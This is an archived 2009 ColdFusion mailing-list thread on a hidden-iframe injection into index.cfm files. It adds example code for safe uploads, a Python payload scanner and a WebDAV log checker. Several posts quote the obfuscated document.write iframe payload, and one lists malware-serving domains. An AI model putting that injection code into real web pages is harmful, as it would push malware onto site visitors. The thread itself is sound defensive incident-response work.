>   5. Open a command line go to the folder that you extracted it to.
> (example, in the command line type: "cd C:\FOLDER\YOU\EXTRACTED\IT\TOO",
> then if it is on a different drive type the drive letter followed by a ":")
>   6. type "php 1.php". Now wait, it may take hours depending on how many
> files it has to read.
>
> This script will ONLY remove the infected files, it will NOT fix the issue.
> We have not figured out what is causing the issue. I have a feeling, since
> we are using access database to hold the info for ColdFusion, that there is
> somewhere in the database it is executing from, however we have no proof
> yet. Another theory is that it somehow implanted itself into one of the CF
> files on whatever site had it infected first. And every time someone goes
> to
> that site it re-runs the script to infect a script to infect other files
> with it.
>
> Step 3: Either uninstall ColdFu
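An added example, not code from any post in this thread, that combines the upload advice given here (Chad's accept attribute, Dave's rename and non-web-accessible directory, Nathan's image verification) into one handler; it assumes ColdFusion 8 or later (for isImageFile, fileMove, fileDelete and the cffile result attribute), a form field named photo, and an application.uploadDir setting that points outside the webroot.

```cfml
<!--- Added example; assumes CF8+, form field "photo" and application.uploadDir
      (a directory that IIS does not serve). --->
<cfset allowedExt = "jpg,jpeg,gif,png">

<!--- 1. Land the file in the temp directory, never in the webroot.
      accept= filters on the MIME type the browser claims, so it is only
      a first filter (Chad's "not foolproof"); a CF error here means the
      claimed type was not in the list. --->
<cftry>
    <cffile action="upload"
            filefield="photo"
            destination="#getTempDirectory()#"
            nameconflict="makeunique"
            accept="image/jpeg,image/gif,image/png"
            result="upl">
    <cfcatch type="any">
        <cfthrow type="UploadRejected"
                 message="Only JPEG, GIF or PNG images are accepted.">
    </cfcatch>
</cftry>

<cfset tmpPath = upl.serverDirectory & "/" & upl.serverFile>
<cfset ext = lCase(upl.serverFileExt)>

<!--- 2. Whitelist the extension and check that the bytes really are an
      image. A logs.asp, or an .asp renamed to .gif, fails one of these. --->
<cfif not listFindNoCase(allowedExt, ext) or not isImageFile(tmpPath)>
    <cfset fileDelete(tmpPath)>
    <cfthrow type="UploadRejected" message="File is not an image.">
</cfif>

<!--- 3. Discard the client's filename: random name, known-safe extension,
      stored outside the webroot, so nothing the uploader controls is ever
      handed to IIS or CF as a script. --->
<cfset safeName = createUUID() & "." & ext>
<cfset fileMove(tmpPath, application.uploadDir & "/" & safeName)>
```

Files stored this way are served back through a CF page with cfcontent rather than by a direct URL, which is what keeps the directory out of IIS's reach.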

RE: Question about hack

2009-04-10 Thread Mark Kruger

Nathan,

Can you answer a question for me. Does this attack affect "all cfm" pages or
does it affect "index.*" pages?

-Mark
 


Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com

-Original Message-
From: Nathan Bruer [mailto:thegreat...@gmail.com] 
Sent: Thursday, April 09, 2009 11:26 PM
To: cf-talk
Subject: Re: Question about hack


Ok, I wanted to post here because I have been looking around on google the
last few days because we had the same issue to give an update on to all the
findings we have found from our investigation...

First off this IS an issue with either mssql/msaccess or ColdFusion or the
combination of the two.

Whatever has been writing the script seems to be embedded in either one of
the coldfusion files somewhere or in the database you are executing from, we
have not figured it out yet.

This is what we have decided to do to solve the issue...

Step 1: Shut down IIS. Whatever is causing this requires IIS to run from
what we have seen.

Step 2: I have written a simple script in PHP (because that is what I script
in) that will go through every file in the specified path and remove
anything that it finds matching the pattern in the 2.txt file. (default is
what was being written to our server). It will log all the files it changed
to alog.log file in the same directory. Here is what you need to do to run
the script...

   1. Download: http://www.rallyinfo.com/fixer.zip
   2. Extract it somewhere on the server.
   3. Install PHP (if you don't already have it, REQ PHP5+ [I believe])
   4. Open the 1.php file in the folder you extracted it to, and edit the
line that says "Path = 'D:/'" to whatever path you want to check for (I'd
suggest running it multiple times on every drive).
   5. Open a command line go to the folder that you extracted it to.
(example, in the command line type: "cd C:\FOLDER\YOU\EXTRACTED\IT\TOO",
then if it is on a different drive type the drive letter followed by a ":")
   6. type "php 1.php". Now wait, it may take hours depending on how many
files it has to read.

This script will ONLY remove the infected files, it will NOT fix the issue.
We have not figured out what is causing the issue. I have a feeling, since
we are using access database to hold the info for ColdFusion, that there is
somewhere in the database it is executing from, however we have no proof
yet. Another theory is that it somehow implanted itself into one of the CF
files on whatever site had it infected first. And every time someone goes to
that site it re-runs the script to infect a script to infect other files
with it.

Step 3: Either uninstall ColdFusion or turn it off so it will no longer be
run in IIS. We decided to uninstall ColdFusion because we only have about 2
sites that still use it, and we have decided to convert them into PHP.

After that I cannot help much, seeing as how we didn't actually find the issue,
but rather made it unable to run any longer.


If you have any questions or comments I will actively watch this thread, and
I will assist in (only through this thread) removing corrupted files.

-Nathan Bruer 



Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321495


RE: Question about hack

2009-04-09 Thread Nick Gleason

Nathan,

Thank you for contributing to this thread.  It reminds me to add a bit of
our research on this issue as well.  A couple of posts which seem very on
point are here:
http://www.diovo.com/2009/03/hidden-iframe-injection-attacks/
http://www.abuse.ch/?p=737

We don't think that this is limited to CF, but there may be a number of
variations in play.

Thanks again,

Nick




Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321494


Re: Question about hack

2009-04-09 Thread Nathan Bruer

Ok, I wanted to post here because I have been looking around on Google the last
few days because we had the same issue, to give an update on all the findings
from our investigation...

First off this IS an issue with either mssql/msaccess or ColdFusion or the
combination of the two.

Whatever has been writing the script seems to be embedded in either one of the
ColdFusion files somewhere or in the database you are executing from; we have
not figured it out yet.

This is what we have decided to do to solve the issue...

Step 1: Shut down IIS. Whatever is causing this requires IIS to run, from what
we have seen.

Step 2: I have written a simple script in PHP (because that is what I script
in) that will go through every file in the specified path and remove anything
that it finds matching the pattern in the 2.txt file (default is what was
being written to our server). It will log all the files it changed to the
alog.log file in the same directory. Here is what you need to do to run the
script...

   1. Download: http://www.rallyinfo.com/fixer.zip
   2. Extract it somewhere on the server.
   3. Install PHP (if you don't already have it; requires PHP 5+ [I believe]).
   4. Open the 1.php file in the folder you extracted it to, and edit the line
      that says "Path = 'D:/'" to whatever path you want to check (I'd suggest
      running it multiple times, once on every drive).
   5. Open a command line and go to the folder that you extracted it to (for
      example, in the command line type "cd C:\FOLDER\YOU\EXTRACTED\IT\TO",
      then if it is on a different drive type the drive letter followed by a
      ":").
   6. Type "php 1.php". Now wait; it may take hours depending on how many files
      it has to read.

This script will ONLY remove the infected files, it will NOT fix the issue. We
have not figured out what is causing the issue. I have a feeling, since we are
using an Access database to hold the info for ColdFusion, that there is somewhere
in the database it is executing from, however we have no proof yet. Another
theory is that it somehow implanted itself into one of the CF files on whatever
site had it infected first. And every time someone goes to that site it re-runs
the script to infect other files with it.

Step 3: Either uninstall ColdFusion or turn it off so it will no longer be run
in IIS. We decided to uninstall ColdFusion because we only have about 2 sites
that still use it, and we have decided to convert them into PHP.

After that I cannot help much, seeing as how we didn't actually find the issue,
but rather made it unable to run any longer.


If you have any questions or comments I will actively watch this thread, and I
will assist in (only through this thread) removing corrupted files.

-Nathan Bruer 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321493
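Nathan's fixer.zip is not on the page, so here is an added example (mine, not Nathan's script) of the same kind of tool in Python: it walks a web root, matches the split-string document.write block quoted earlier in the thread, and by default only reports each infected file with its last-modified time, which is the evidence you want to line up against FTP/WebDAV/IIS logs before you change anything. The <script> wrapper around the payload, the file extensions scanned and the log file name are assumptions made here; the sample web root is constructed inside the script.

```python
"""Find (and optionally strip) an injected document.write block in web files.

Added example for this thread, not Nathan Bruer's fixer.zip. The match pattern
is built from the scrubbed snippet Nick quoted; the <script> wrapper, scanned
extensions and log file name are assumptions made here.
"""
import datetime
import os
import re
import tempfile

# Constructed sample: the scrubbed payload from the thread, wrapped in the
# <script> tags that the archive page stripped (assumed).
INJECTED_SAMPLE = """<script type="text/javascript"><!--
   var applstrna0 = "<if";
   var applstrna1 = "rame src=http://said7";
   var applstrna2 = ".[BAD URL HERE]";
   var applstrna3 = " width=100 height=0></i";
   var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
//--></script>"""

# One whole injected block: optional <script>, the comment opener, one or more
# `var name = "...";` lines, a document.write(...), the comment closer and an
# optional </script>. Variable names are not hard-coded because they change.
INJECTED_BLOCK = re.compile(
    r"(?:<script[^>]*>\s*)?<!--\s*"
    r"(?:var\s+\w+\s*=\s*\"[^\"\r\n]*\"\s*;\s*)+"
    r"document\.write\([^)]*\)\s*;\s*"
    r"//-->\s*(?:</script>)?",
    re.IGNORECASE,
)

WEB_EXTS = {".cfm", ".cfc", ".htm", ".html", ".asp", ".php", ".js"}


def _read(path):
    # latin-1 round-trips every byte unchanged, so cleaning never corrupts
    # files in an unknown encoding.
    with open(path, "rb") as fh:
        return fh.read().decode("latin-1")


def scan_file(path):
    """Number of injected blocks in one file (0 if clean)."""
    return len(INJECTED_BLOCK.findall(_read(path)))


def clean_file(path):
    """Remove injected blocks from one file in place; return how many."""
    cleaned, count = INJECTED_BLOCK.subn("", _read(path))
    if count:
        with open(path, "wb") as fh:
            fh.write(cleaned.encode("latin-1"))
    return count


def scan_tree(root, clean=False, log_path=None, exts=WEB_EXTS):
    """Walk root; return (path, mtime ISO-8601, block count) per infected file.

    Default is a dry run: nothing is written, and the recorded mtime is the
    untouched file's, which is what you compare against FTP/WebDAV/IIS logs.
    With clean=True the block is removed and each file is appended to log_path.
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in exts:
                continue
            path = os.path.join(dirpath, name)
            stamp = datetime.datetime.fromtimestamp(os.path.getmtime(path))
            count = scan_file(path)
            if not count:
                continue
            if clean:
                clean_file(path)
            hits.append((path, stamp.isoformat(timespec="seconds"), count))
    if clean and log_path and hits:
        with open(log_path, "a", encoding="utf-8") as log:
            for path, stamp, count in hits:
                log.write(f"{stamp}\t{count}\t{path}\n")
    return hits


def build_sample_tree():
    """Constructed web root: one infected index.cfm, one clean page, one image."""
    root = tempfile.mkdtemp(prefix="webroot-")
    site = os.path.join(root, "site1")
    os.makedirs(site)
    with open(os.path.join(site, "index.cfm"), "w", encoding="latin-1") as fh:
        fh.write("<cfoutput>Welcome</cfoutput>\n</body></html>\n" + INJECTED_SAMPLE + "\n")
    with open(os.path.join(site, "about.cfm"), "w", encoding="latin-1") as fh:
        fh.write("<cfoutput>About us</cfoutput>\n")
    with open(os.path.join(site, "logo.gif"), "wb") as fh:
        fh.write(b"GIF89a")
    return root


if __name__ == "__main__":
    webroot = build_sample_tree()
    for path, stamp, count in scan_tree(webroot):      # dry run first
        print(f"{stamp}  {count} block(s)  {path}")
    scan_tree(webroot, clean=True, log_path=os.path.join(webroot, "cleaned.log"))
```

Run the dry run first and keep its output: once clean=True rewrites a file its mtime is yours, not the attacker's, and the timeline is gone. As Nathan and Dave Watts both say, this only removes the payload; whatever wrote it still has to be found and closed.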


Re: Question about hack

2009-04-08 Thread Tom Chiverton

On Monday 06 Apr 2009, Dave Watts wrote:
> > In that case, you can no longer trust the host, or its
> > host (if it's virtualised). In the latter case, all other
> > guests on the same box are also suspect.
> I've not heard of a remote exploit that can climb out of a VM.

It's trivial to do (look at Invisible Labs red pill / blue pill work for how 
it works on 'bare metal' hypervisors, and there was an exploit against VMWare 
the other year).
If I was targeting ecommerce sites, I'd want to tick that box in my malware's 
toolkit.

-- 
Helping to completely enable impactful end-to-end data as part of the IT team 
of the year, '09 and '08

Tom Chiverton
Developer
Tel: +44 0161 618 5032
Fax: +44 0161 618 5099 
tom.chiver...@halliwells.com
3 Hardman Square, Manchester, M3 3EB
www.Halliwells.com



This email is sent for and on behalf of Halliwells LLP.

Halliwells LLP is a limited liability partnership registered in England and 
Wales under registered number OC307980 whose registered office address is at 
Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of 
members is available for inspection at the registered office together with a 
list of those non members who are referred to as partners. We use the word 
“partner” to refer to a member of the LLP, or an employee or consultant with 
equivalent standing and qualifications. Regulated by the Solicitors Regulation 
Authority.

CONFIDENTIALITY

This email is intended only for the use of the addressee named above and may be 
confidential or legally privileged. If you are not the addressee you must not 
read it and must not use any information contained in nor copy it nor inform 
any person other than Halliwells LLP or the addressee of its existence or 
contents. If you have received this email in error please delete it and notify 
Halliwells LLP IT Department on 0870 365 2500.

For more information about Halliwells LLP visit www.Halliwells.com.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321442


Re: Question about hack

2009-04-06 Thread Dave Watts

> In that case, you can no longer trust the host, or its
> host (if it's virtualised). In the latter case, all other
> guests on the same box are also suspect.

I've not heard of a remote exploit that can climb out of a VM.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321379


Re: Question about hack

2009-04-06 Thread Dave Watts

> So, I guess one question is whether an XSS type
> hack can result in code being added to a file on the
> web server.

No, not by itself. The WebDAV that Mosh mentioned, that's a likely culprit.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321378


Re: Question about hack

2009-04-06 Thread Dave Watts

> Hi there.  We've just seen a hack attempt that we
> haven't seen before and I wanted to get feedback.
>
> The symptom is that some script code is inserted at
> the bottom of certain pages (e.g. index.cfm).  The
> script (which has been scrubbed) looks like this:
> 
>
> The script downloads malware, which we obviously
> want to prevent. We're trying to determine how it's
> getting in there, whether through an old site with
> inadequate code or the OS or something else. Any
> thoughts?
>
> This is on a server running IIS 6 / CF7.

My first thought is, if this script has actually been written to your
.cfm files, this is a successful hack, not a hack attempt.

My second thought is, why are these files writeable in the first
place? In the vast majority of CF apps, neither the CF user account
nor the IIS user account needs write permission to your CF files.

Finally, I'm not aware of any specific worm that does this exact
thing. Nor am I aware of any IIS issue that would allow this. My guess
is that you have some CF application that allows writes to the
filesystem; perhaps one of the CF sample apps?

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321377


RE: Question about hack

2009-04-06 Thread Mosh Teitelbaum

Nick:

In addition to FTP, etc., check to see if you have WebDAV enabled on your
server.  It's an extension of HTTP that allows people to remotely author
files on a website.  A couple of years back, a client of mine had their site
modified with WebDAV and, upon further review, every site on that server
that had an index.cfm file had had that file modified to include the
malicious code.

HTH

--
Mosh Teitelbaum
evoch, LLC
Tel: (301) 942-5378
Fax: (301) 933-3651
Email: mosh.teitelb...@evoch.com
WWW: http://www.evoch.com/


> -Original Message-
> From: Nick Gleason [mailto:n.glea...@citysoft.com]
> Sent: Monday, April 06, 2009 2:19 PM
> To: cf-talk
> Subject: Question about hack
> 
> 
> Hi there.  We've just seen a hack attempt that we haven't seen before
> and I
> wanted to get feedback.
> 
> The symptom is that some script code is inserted at the bottom of
> certain
> pages (e.g. index.cfm).  The script (which has been scrubbed) looks
> like
> this:
> <!--
>    var applstrna0 = "<if";
>    var applstrna1 = "rame src=http://said7";
>    var applstrna2 = ".[BAD URL HERE]";
>    var applstrna3 = " width=100 height=0></i";
>    var applstrna4 = "frame>";
> document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
> //-->
> 
> The script downloads malware, which we obviously want to prevent.
> We're
> trying to determine how it's getting in there, whether through an old
> site
> with inadequate code or the OS or something else.  Any thoughts?
> 
> This is on a server running IIS 6 / CF7.
> 
> Thanks in advance,
> 
> Nick
> 
> 
> 
> 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321376
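As an added example (not Mosh's code), two checks for the WebDAV exposure he describes, in Python: classify an HTTP OPTIONS response by its DAV and Allow headers, and pull the DAV write methods out of an IIS 6 W3C log so a PUT against index.cfm stands out. The OPTIONS responses and log lines are constructed for the example, and the header set is what an IIS 6 host with WebDAV enabled is expected to send, an assumption rather than a capture; probe() is the only part that touches a network and is not exercised by the sample data.

```python
"""Two checks for the WebDAV exposure Mosh describes.

Added example for this thread, not Mosh's code. The OPTIONS responses and the
IIS log lines are constructed for the example; the header set mirrors what an
IIS 6 host with WebDAV enabled is expected to send (assumption, not a capture).
"""
import http.client

DAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK", "SEARCH"}
# Anything in this set lets a client change files on disk, which is exactly
# how index.cfm gets rewritten.
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "COPY", "MOVE", "PROPPATCH"}

# Constructed OPTIONS responses: WebDAV on, and WebDAV off.
RESPONSE_WEBDAV_ON = {
    "Server": "Microsoft-IIS/6.0",
    "Allow": "OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, PROPFIND, "
             "PROPPATCH, MKCOL, LOCK, UNLOCK, SEARCH",
    "Public": "OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, PROPFIND, "
              "PROPPATCH, MKCOL, LOCK, UNLOCK, SEARCH",
    "DAV": "1, 2",
    "MS-Author-Via": "DAV",
}
RESPONSE_WEBDAV_OFF = {
    "Server": "Microsoft-IIS/6.0",
    "Allow": "OPTIONS, TRACE, GET, HEAD, POST",
}

# Constructed IIS 6 W3C extended log excerpt (RFC 5737 documentation addresses).
IIS_LOG = """#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2009-04-05 03:12:44
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2009-04-05 03:12:44 10.0.0.5 GET /index.cfm - 80 - 198.51.100.23 Mozilla/4.0 200 0 0
2009-04-05 03:13:01 10.0.0.5 OPTIONS / - 80 - 203.0.113.77 Microsoft-WebDAV-MiniRedir/5.1.2600 200 0 0
2009-04-05 03:13:02 10.0.0.5 PROPFIND /site1/ - 80 - 203.0.113.77 Microsoft-WebDAV-MiniRedir/5.1.2600 207 0 0
2009-04-05 03:13:05 10.0.0.5 PUT /site1/index.cfm - 80 - 203.0.113.77 Microsoft-WebDAV-MiniRedir/5.1.2600 200 0 0
2009-04-05 03:13:09 10.0.0.5 PUT /site2/index.cfm - 80 - 203.0.113.77 Microsoft-WebDAV-MiniRedir/5.1.2600 401 1 0
2009-04-05 03:14:10 10.0.0.5 GET /site1/index.cfm - 80 - 198.51.100.40 Mozilla/4.0 200 0 0
"""


def assess_options(headers):
    """Classify an OPTIONS response by its DAV / MS-Author-Via / Allow / Public headers."""
    lower = {k.lower(): v for k, v in headers.items()}
    advertised = set()
    for name in ("allow", "public"):
        if name in lower:
            advertised |= {m.strip().upper() for m in lower[name].split(",") if m.strip()}
    dav = "dav" in lower or "ms-author-via" in lower or bool(advertised & DAV_METHODS)
    return {
        "server": lower.get("server", ""),
        "dav": dav,
        "write_methods": sorted(advertised & WRITE_METHODS),
    }


def probe(host, path="/", port=80, timeout=5):
    """Live OPTIONS request against a host you own (network; not used by the sample data)."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("OPTIONS", path)
        response = conn.getresponse()
        return assess_options(dict(response.getheaders()))
    finally:
        conn.close()


def parse_w3c(log_text):
    """Yield one dict per request line, keyed by the names in the #Fields: directive."""
    fields = None
    for raw in log_text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
        elif raw and not raw.startswith("#") and fields:
            yield dict(zip(fields, raw.split()))


def dav_requests(log_text):
    """(timestamp, method, uri, client ip, status) for every DAV or write method seen."""
    rows = []
    for rec in parse_w3c(log_text):
        method = rec["cs-method"].upper()
        if method in DAV_METHODS or method in WRITE_METHODS:
            rows.append((f"{rec['date']} {rec['time']}", method, rec["cs-uri-stem"],
                         rec["c-ip"], int(rec["sc-status"])))
    return rows


def successful_writes(log_text):
    """The subset that actually changed content: write methods with a 2xx/3xx status."""
    return [r for r in dav_requests(log_text) if r[1] in WRITE_METHODS and r[4] < 400]


if __name__ == "__main__":
    print(assess_options(RESPONSE_WEBDAV_ON))
    print(assess_options(RESPONSE_WEBDAV_OFF))
    for row in successful_writes(IIS_LOG):
        print("file written over WebDAV:", row)
```

An OPTIONS response only tells you what that site advertises; another host header or port on the same box can answer differently, so confirm in IIS Manager under Web Service Extensions, where IIS 6 lists WebDAV and ships it prohibited. If it shows Allowed and nothing needs it, prohibit it, then read the W3C logs for the PUT/PROPPATCH/COPY requests that produced the modified files.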


RE: Question about hack

2009-04-06 Thread Tom Chiverton

And if your CFML templates have been changed, it is possible that malware has 
been installed on the server itself (via cfexecute).
In that case, you can no longer trust the host, or its host (if it's 
virtualised). In the latter case, all other guests on the same box are also 
suspect.

Tom Chiverton
Developer
Tel: +44 0161 618 5032
Fax: +44 0161 618 5099 
tom.chiver...@halliwells.com
3 Hardman Square, Manchester, M3 3EB
www.Halliwells.com

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321374


RE: Question about hack

2009-04-06 Thread brad

Nick, it is *POSSIBLE* for your actual index.cfm files to be modified
via SQL injection (xp_cmdshell on MS SQL Server), but it is highly
doubtful.

I can't think of a scenario where XSS could actually affect files on
your server since that is a client-based attack.  The XSS attack would
need to be coupled with a server-side vulnerability.

I would focus directly on all of your FTP access, Windows file sharing
access, and telnet/remote desktop connections.  If you are using shared
hosting, your problem just got a lot harder to track down.

Also, for the record-- it is possible for an attacker to modify cfm
files on your server if you have a piece of your application that allows
users to upload files to the server (like images or attachments) and
these files are placed in a web accessible location where they could be
accessed via a URL and executed.  (imagine uploading a .cfm file with a
few cffile tags in it...)  
The probability of this sort of attack is smaller than the chances of
someone brute-forcing your FTP login though.

Like I said before, change ALL your passwords, and check your logs.  If
this is a publicly accessible server, it should be behind a firewall
blocking ALL ports not absolutely necessary (like 80 and 443).

~Brad

 Original Message 
Subject: RE: Question about hack
From: "Nick Gleason" 
Date: Mon, April 06, 2009 3:10 pm
To: cf-talk 


Brad,

Many thanks for your response. We'll take a look at those things.

It appears that the code is in the actual index.cfm pages on the web
server.
There are some old sites on this server that may be vulnerable, so that
is a
theory. However, I would expect that kind of vulnerability to result in
a
database injection, which is not what we are seeing. So, I guess one
question is whether an XSS type hack can result in code being added to a
file on the web server.



Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321373


RE: Question about hack

2009-04-06 Thread Bosky, Dave

It's an iframe injection hack. It will insert a hidden frame into any
index.* page it finds.
Some URL entries inserted are 'ggleleadsense.biz/?click=*',
'mediahousenameshopfilm.cn/in.cgi?income29'
Change FTP passwords...


-Original Message-
From: Nick Gleason [mailto:n.glea...@citysoft.com] 
Sent: Monday, April 06, 2009 4:28 PM
To: cf-talk
Subject: RE: Question about hack


William,

That's a great post - we're re-reading it now.  However, this situation
seems to be code in the index.cfm page, not something being appended
from
the db.  So, I'm not sure if that post will be relevant in this case.

Thoughts?

N

> -Original Message-
> From: William [mailto:will...@seiter.com] 
> Sent: Monday, April 06, 2009 3:50 PM
> To: cf-talk
> Subject: RE: Question about hack
> 
> 
> Do a search on this list for 'exec('
> There was a big to-do about this last summer.  Probably in 
> your database
> 
> 
> 
> -Original Message-
> From: Nick Gleason 
> Sent: Monday, April 06, 2009 2:19 PM
> To: cf-talk 
> Subject: Question about hack
> 
> 
> Hi there.  We've just seen a hack attempt that we haven't 
> seen before and I wanted to get feedback.
> 
> The symptom is that some script code is inserted at the 
> bottom of certain pages (e.g. index.cfm).  The script (which 
> has been scrubbed) looks like
> this:
> <!--
>    var applstrna0 = "<if";
>    var applstrna1 = "rame src=http://said7";
>    var applstrna2 = ".[BAD URL HERE]";
>    var applstrna3 = " width=100 height=0></i";
>    var applstrna4 = "frame>";
> document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
> //--> 
> 
> The script downloads malware, which we obviously want to 
> prevent.  We're trying to determine how it's getting in 
> there, whether through an old site with inadequate code or 
> the OS or something else.  Any thoughts?
> 
> This is on a server running IIS 6 / CF7.
> 
> Thanks in advance,
> 
> Nick
> 
> 
> 
> 
> 
> 



Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321369


RE: Question about hack

2009-04-06 Thread Nick Gleason

William,

That's a great post - we're re-reading it now.  However, this situation
seems to be code in the index.cfm page, not something being appended from
the db.  So, I'm not sure if that post will be relevant in this case.

Thoughts?

N

> -Original Message-
> From: William [mailto:will...@seiter.com] 
> Sent: Monday, April 06, 2009 3:50 PM
> To: cf-talk
> Subject: RE: Question about hack
> 
> 
> Do a search on this list for 'exec('
> There was a big to-do about this last summer.  Probably in 
> your database
> 
> 
> 
> -Original Message-
> From: Nick Gleason 
> Sent: Monday, April 06, 2009 2:19 PM
> To: cf-talk 
> Subject: Question about hack
> 
> 
> Hi there.  We've just seen a hack attempt that we haven't 
> seen before and I wanted to get feedback.
> 
> The symptom is that some script code is inserted at the 
> bottom of certain pages (e.g. index.cfm).  The script (which 
> has been scrubbed) looks like
> this:
> <!--
>    var applstrna0 = "<if";
>    var applstrna1 = "rame src=http://said7";
>    var applstrna2 = ".[BAD URL HERE]";
>    var applstrna3 = " width=100 height=0></i";
>    var applstrna4 = "frame>";
> document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4);
> //--> 
> 
> The script downloads malware, which we obviously want to 
> prevent.  We're trying to determine how it's getting in 
> there, whether through an old site with inadequate code or 
> the OS or something else.  Any thoughts?
> 
> This is on a server running IIS 6 / CF7.
> 
> Thanks in advance,
> 
> Nick
> 
> 
> 
> 
> 
> 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321366


RE: Question about hack

2009-04-06 Thread Nick Gleason

Brad,

Many thanks for your response.  We'll take a look at those things.

It appears that the code is in the actual index.cfm pages on the web server.
There are some old sites on this server that may be vulnerable, so that is a
theory.  However, I would expect that kind of vulnerability to result in a
database injection, which is not what we are seeing.  So, I guess one
question is whether an XSS type hack can result in code being added to a
file on the web server.

Thoughts?

N


> -Original Message-
> From: b...@bradwood.com [mailto:b...@bradwood.com] 
> Sent: Monday, April 06, 2009 3:46 PM
> To: cf-talk
> Subject: RE: Question about hack
> 
> 
> Is the malicious string in the actual index.cfm page on the 
> server, or is it being output on the page when CF processes 
> it as part of a variable from the form/url or database?
> 
> If the actual files on your web server have been modified, 
> change all your FTP and remote admin passwords immediately 
> and run an antivirus scan.
> Also, check your FTP logs, and date/time modified on the 
> files to determine when and how they were modified.  Run an 
> extended find and replace to clean your .cfm files.
> 
> If the string is being appended into a url or form field and 
> then output on the page, htmleditformat or jsstringformat all 
> user-entered data and read up on XSS attacks.
> 
> If the string has been appended into your database variables 
> and is being output on the page that way, look for 
> unparameterized SQL statements, run a queryparam scanner, 
> change your SQL Server login passwords, and read up on SQL 
> injection attacks.  Update your database to remove the 
> malicious values.
> 
> ~Brad
> 
>  Original Message 
> Subject: Question about hack
> From: "Nick Gleason" 
> Date: Mon, April 06, 2009 1:19 pm
> To: cf-talk 
> 
> 
> Hi there. We've just seen a hack attempt that we haven't seen 
> before and I wanted to get feedback.
> 
> The symptom is that some script code is inserted at the 
> bottom of certain pages (e.g. index.cfm). The script (which 
> has been scrubbed) looks like
> this:
> 
> 
> 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321365


RE: Question about hack

2009-04-06 Thread William

Do a search on this list for 'exec('
There was a big to-do about this last summer.  Probably in your database



-Original Message-
From: Nick Gleason 
Sent: Monday, April 06, 2009 2:19 PM
To: cf-talk 
Subject: Question about hack


Hi there.  We've just seen a hack attempt that we haven't seen before and I
wanted to get feedback.

The symptom is that some script code is inserted at the bottom of certain
pages (e.g. index.cfm).  The script (which has been scrubbed) looks like
this:
<!--
   var applstrna0 = "<if";
   var applstrna1 = "rame src=http://said7";
   var applstrna2 = ".[BAD URL HERE]";
   var applstrna3 = " width=100 height=0></i";
   var applstrna4 = "frame>";
document.write(applstrna0+applstrna1+applstrna2+applstrna3+applstrna4); 
//--> 

The script downloads malware, which we obviously want to prevent.  We're
trying to determine how it's getting in there, whether through an old site
with inadequate code or the OS or something else.  Any thoughts?

This is on a server running IIS 6 / CF7.

Thanks in advance,

Nick





Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321362


RE: Question about hack

2009-04-06 Thread brad

Is the malicious string in the actual index.cfm page on the server, or
is it being output on the page when CF processes it as part of a
variable from the form/url or database?

If the actual files on your web server have been modified, change all
your FTP and remote admin passwords immediately and run an antivirus
scan.
Also, check your FTP logs, and date/time modified on the files to
determine when and how they were modified.  Run an extended find and
replace to clean your .cfm files.

If the string is being appended into a url or form field and then output
on the page, htmleditformat or jsstringformat all user-entered data and
read up on XSS attacks.

If the string has been appended into your database variables and is
being output on the page that way, look for unparameterized SQL
statements, run a queryparam scanner, change your SQL Server login
passwords, and read up on SQL injection attacks.  Update your database
to remove the malicious values.

~Brad

 Original Message 
Subject: Question about hack
From: "Nick Gleason" 
Date: Mon, April 06, 2009 1:19 pm
To: cf-talk 


Hi there. We've just seen a hack attempt that we haven't seen before and
I
wanted to get feedback.

The symptom is that some script code is inserted at the bottom of
certain
pages (e.g. index.cfm). The script (which has been scrubbed) looks like
this:


Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321361
